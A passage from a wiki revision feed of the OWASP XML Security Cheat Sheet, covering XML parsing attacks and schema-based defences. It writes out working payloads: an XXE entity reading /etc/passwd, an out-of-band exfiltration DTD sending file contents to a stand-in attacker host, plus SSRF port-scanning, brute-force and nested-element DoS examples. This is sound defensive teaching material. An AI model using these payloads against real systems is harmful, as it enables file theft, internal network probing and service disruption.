Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External DNS Resolution ====&lt;br /&gt;
&lt;br /&gt;
Sometimes is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.&lt;br /&gt;
 &amp;lt;!DOCTYPE m PUBLIC &amp;quot;-//B/A/EN&amp;quot; &amp;quot;http://'''checkforthisspecificdomain'''.example.com&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''% xxe''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM '&amp;lt;nowiki/&amp;gt;'''&amp;lt;nowiki&amp;gt;http://example.com/?%file;'&amp;lt;/nowiki&amp;gt;'''''&amp;gt;&amp;quot;&amp;gt;''&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: &amp;lt;nowiki&amp;gt;http://192.168.1.1:80&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc). For example the following :&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229414</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229414"/>
				<updated>2017-05-04T16:41:26Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* Server Side Request Forgery */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;nowiki&amp;gt;&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
